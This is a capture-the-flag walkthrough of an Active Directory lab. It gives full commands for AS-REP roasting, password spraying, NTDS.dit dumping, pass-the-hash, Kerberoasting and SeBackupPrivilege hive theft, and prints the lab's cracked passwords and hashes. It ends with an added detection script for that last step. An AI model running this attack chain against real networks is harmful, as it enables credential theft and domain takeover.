Active Directory, Pass the Hash Attack,
RazorBlack
Reconnaissance with Nmap
```
nmap -p 53,88,111,135,139,389,445,464,593,636,2049,3268,3269,3389,5985,9389,49664,49665,49667,49669,49670,49672,49673,49692,49704,49831 -sCV -oN map.txt -

Nmap scan report for -
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: -:59:02Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4      111/tcp     rpcbind
|   100000  2,3,4      111/tcp6    rpcbind
|   100000  2,3,4      111/udp     rpcbind
|   100000  2,3,4      111/udp6    rpcbind
|   100003  2,3        2049/udp    nfs
|   100003  2,3        2049/udp6   nfs
|   100003  2,3,4      2049/tcp    nfs
|   100003  2,3,4      2049/tcp6   nfs
|   100005  1,2,3      2049/tcp    mountd
|   100005  1,2,3      2049/tcp6   mountd
|   100005  1,2,3      2049/udp    mountd
|   100005  1,2,3      2049/udp6   mountd
|   100021  1,2,3,4    2049/tcp    nlockmgr
|   100021  1,2,3,4    2049/tcp6   nlockmgr
|   100021  1,2,3,4    2049/udp    nlockmgr
|   100021  1,2,3,4    2049/udp6   nlockmgr
|   100024  1          2049/tcp    status
|   100024  1          2049/tcp6   status
|   100024  1          2049/udp    status
|_  100024  1          2049/udp6   status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: raz0rblack.thm, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RAZ0RBLACK
|   NetBIOS_Domain_Name: RAZ0RBLACK
|   NetBIOS_Computer_Name: HAVEN-DC
|   DNS_Domain_Name: raz0rblack.thm
|   DNS_Computer_Name: HAVEN-DC.raz0rblack.thm
|   Product_Version: -
|_  System_Time: -T13:00:00+00:00
|_ssl-date: -T13:00:09+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=HAVEN-DC.raz0rblack.thm
| Not valid before: -T12:50:45
|_Not valid after:  -T12:50:45
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49672/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49704/tcp open  msrpc         Microsoft Windows RPC
49831/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HAVEN-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: -T13:00:03
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul 26 14:01:54 2023 -- 1 IP address (1 host up) scanned in 179.97 seconds
```
Service Enumeration
[+] Port 139/445[SMB]
Version: null
Public Exploit:
- Using Crackmapexec to enumerate
- Blank Authentication
> crackmapexec smb -u '' -p '' --shares
- Using smbclient to enumerate
- Blank Authentication
> smbclient -L -U "" //IP/
- Shows we cannot access the shares anonymously, but still displays some useful information, like the name of the domain.
- raz0rblack.thm
[+] Port 135[RPC]
Version: Microsoft Windows RPC
Public Exploit:
- Using rpcclient to enumerate
- Blank authentication (null session), because we currently don't have credentials
> rpcclient -U "" -N -
- Got NT_STATUS_LOGON_FAILURE
[+] Port 389[LDAP]
Version: Microsoft Windows Active Directory LDAP
Public Exploit:
- Using ldapsearch to enumerate
- Checking the naming contexts
> ldapsearch -x -H ldap:// -s base namingcontexts
- Using naming contexts to get information from the DC
> ldapsearch -x -H ldap:// -s sub "DC=raz0rblack,DC=thm"
- Using ldapdomaindump to enumerate
> ldapdomaindump -n -m HAVEN-DC
- Neither enumeration returned anything useful (anonymous LDAP binds are not allowed here)
[+] Port 2049[NFS]
Version:
Public Exploit:
- Using showmount to enumerate NFS shares
> showmount -e
- Create a mount location
> mkdir /tmp/users
- Mounting the exported share /users
> sudo mount -t nfs :/users /tmp/users -o nolock
- Navigate to the mount directory
- Open the file `employee_status.xlsx` with LibreOffice, we got the following information
daven port
imogen royce
tamara vidal
arthur edwards
carl ingram
nolan cassidy
reza zaydan
ljudmila vetrova
rico delgado
tyson williams
steven bradley
chamber lin
- Using a tool like ADGenerator.py, we can change the names format from full name to AD usernames.
[+] Port 88[kerberos]
Version:
Public Exploit:
- After getting usernames, we can use kerbrute to validate which of them exist in the domain
> kerbrute userenum -d raz0rblack.thm --dc username.txt
[+] AS-REP Roasting
- Now, using Impacket's GetNPUsers.py, we can check for users with "Do not require Kerberos preauthentication" set
> GetNPUsers.py / -dc-ip -no-pass -usersfile
- We get the kerberos hash of the user twilliams and can use john to crack it.
> john --wordlist=/ hash.txt
twilliams:roastpotatoes
[+] Password Spraying with kerbrute
- Using Kerbrute to check for users with the same password
> kerbrute passwordspray --dc -d raz0rblack.thm users.txt 'roastpotatoes'
- We discover that sbradley has the same password as twilliams
- Using crackmapexec to validate the password, we see that the password has expired
Initial Foothold
[+] Password Reset with impacket-smbpasswd
- We can change sbradley's password with this tool
> impacket-smbpasswd sbradley@
- password was changed to 'whatshell'
[+] SMB Enumeration with Credentials
With valid credentials now, we can do an Authenticated enumeration on the SMB server.
- Using smbmap to enumerate
> smbmap -H -u 'sbradley' -p 'whatshell' -R
- Under the trash share, we find a couple of files.
- chat_log_-.txt
- sbradley.txt
- experiment_gone_wrong.zip
- Reading the content of the log file, we find an interesting conversation between sbradley and the Administrator. It
turns out that the NTDS.dit and SYSTEM.hive files are both inside the password-protected zip.
[+] Zip Password Cracking
Using a tool like zip2john, we can convert the zip file into a hash format that John the Ripper can crack.
- Convert the zip file to johntheripper compatible hash
> zip2john experiment_gone_wrong.zip > hash.txt
- Crack with john
> john --wordlist=/rockyou.txt hash.txt
#password: electromagnetismo
[+] Dumping Hashes
We currently have the NTDS.dit file and the system.hive file. With both files, we can dump all users and their hash on
the Domain.
- Using impacket-secretsdump
> impacket-secretsdump -ntds -system LOCAL
- With this we successfully dump a long list of usernames and their NTLM hashes
[+] Pass the Hash Attack
Performing a pass-the-hash attack against the valid usernames we have, using the dumped hashes
- First you need to trim the hash to exclude the username and LM hash
> cat hash.dump | cut -d':' -f'4' | sed '/^$/d' > hash.full
- Using crackmapexec to perform a pass-the-hash attack
> crackmapexec smb -u username.txt -H hash.full --continue-on-success
lvetrova:f220d3988deb3f516c73f40ee16c431d
[+] Evil-winrm
With the NTLM hash discovered, we can get a shell as user lvetrova using Evil-winrm
> evil-winrm -i -u lvetrova -H f220d3988deb3f516c73f40ee16c431d
Post Exploitation
[+] Powershell Credentials
- Navigating to C:\Users\lvetrova we find an xml file that contains a flag stored as a securestring
- We can follow the following methods to retrieve the cleartext from the .xml file
- First method: using Import-Clixml
> $credential = Import-Clixml -Path "lvetrova.xml"
> $credential.GetNetworkCredential().password
- Second method: rebuilding the PSCredential object from the encrypted SecureString in the file
> $pw = "" | ConvertTo-SecureString
> $cred = New-Object System.Management.Automation.PSCredential("lvetrova", $pw)
> $cred.GetNetworkCredential() | fl
[+] Lateral Movement
Enumerating the machine for possible kerberoastable accounts
- The user `xyan1d3` has an SPN set, so the account is kerberoastable
- Using impacket-GetUserSPNs
> impacket-GetUserSPNs -request -dc-ip / -hashes
- We got the TGS from the DC and can use john-the-ripper to extract the SPN's password from this
> john --wordlist=/rockyou.txt krbtgs.hash
`cyanide9amine5628`
- Using the newly discovered password we can log in as user `xyan1d3` using evil-winrm
> evil-winrm -i -u xyan1d3 -p cyanide9amine5628
[+] Privilege Escalation
- Running the `whoami /priv` command on xyan1d3, shows we have some interesting privileges
- SeBackupPrivilege: Can be used to back up files and directories
- Create a directory and save the SAM and SYSTEM hives into it
> mkdir c:\temp
> reg save hklm\sam c:\temp\sam
> reg save hklm\system c:\temp\system
- Move both files over to your attack machine and dump the hashes
- Dumping the hashes with pypykatz
> pypykatz registry --sam sam system
- From the dump we can use the Administrator hash to perform a pass-the-hash attack with evil-winrm
> evil-winrm -i -u Administrator -H -bed40ca5a2ce-f0c
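The privilege escalation above is a two-step sequence that is easy to spot on the domain controller: a logon that receives SeBackupPrivilege (event 4672, "Special privileges assigned to new logon") followed by `reg save` of the SAM or SYSTEM hive (event 4688, process creation, which only carries the command line when command-line auditing is enabled). The script below is an added example for this page, not part of the writeup or of pypykatz or evil-winrm; the events, the `svc_backup` allow-list entry and the `c:\temp` paths it matches are constructed.

```python
"""Flag the SeBackupPrivilege path used above (privileged logon, then
`reg save` of the SAM/SYSTEM hives) in Windows Security events.
Added example for this page; the allow-list and the events are constructed."""
import re

# Accounts expected to hold SeBackupPrivilege (constructed allow-list);
# on a real domain this is the Backup Operators membership you approved.
ALLOWED_BACKUP_ACCOUNTS = {"svc_backup"}

EVENTS = [
    # 4672: special privileges assigned to a new logon
    {"id": 4672, "user": "svc_backup",
     "privs": "SeBackupPrivilege SeRestorePrivilege"},
    {"id": 4672, "user": "xyan1d3",
     "privs": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"id": 4672, "user": "lvetrova", "privs": "SeChangeNotifyPrivilege"},
    # 4688: process creation with command-line auditing enabled
    {"id": 4688, "user": "xyan1d3",
     "cmd": r"reg  save hklm\sam c:\temp\sam"},
    {"id": 4688, "user": "xyan1d3",
     "cmd": r'"C:\Windows\system32\reg.exe" save HKLM\SYSTEM c:\temp\system'},
    {"id": 4688, "user": "lvetrova",
     "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"},
    {"id": 4688, "user": "svc_backup",
     "cmd": r"wbadmin start backup -backupTarget:E:"},
]

# reg / reg.exe (optionally quoted) saving SAM, SYSTEM or SECURITY from HKLM
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?hklm\\(sam|system|security)\b', re.I)


def unexpected_backup_logons(events, allowed=ALLOWED_BACKUP_ACCOUNTS):
    """Users granted SeBackupPrivilege at logon who are not on the allow-list."""
    allowed = {a.lower() for a in allowed}
    return sorted({e["user"] for e in events
                   if e["id"] == 4672
                   and "SeBackupPrivilege" in e["privs"].split()
                   and e["user"].lower() not in allowed})


def hive_save_commands(events):
    """(user, hive) for every process creation that saved a credential hive."""
    hits = []
    for e in events:
        if e["id"] != 4688:
            continue
        m = HIVE_SAVE.search(e["cmd"])
        if m:
            hits.append((e["user"], m.group(1).lower()))
    return hits


def backup_privilege_abuse(events):
    """Accounts that both held an unexpected SeBackupPrivilege and dumped a
    hive: the exact sequence walked through above, and the one alert worth
    paging on rather than the two signals on their own."""
    privileged = set(unexpected_backup_logons(events))
    dumpers = {user for user, _ in hive_save_commands(events)}
    return sorted(privileged & dumpers)


if __name__ == "__main__":
    print("unexpected SeBackupPrivilege:", unexpected_backup_logons(EVENTS))
    print("hive saves:", hive_save_commands(EVENTS))
    print("abuse candidates:", backup_privilege_abuse(EVENTS))
```

On the constructed events only xyan1d3 trips all three checks: svc_backup holds the privilege legitimately and never touches the hives, and lvetrova's `reg query` is not a save. The durable fix is on the account, not the detection: an ordinary user should not be in Backup Operators (or otherwise hold SeBackupPrivilege) on a domain controller, because, as shown above, that privilege reads the SAM and SYSTEM hives regardless of their ACLs.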
[+] NT AUTHORITY\SYSTEM
https://juggernaut-sec.com/sebackupprivilege/
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/
https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960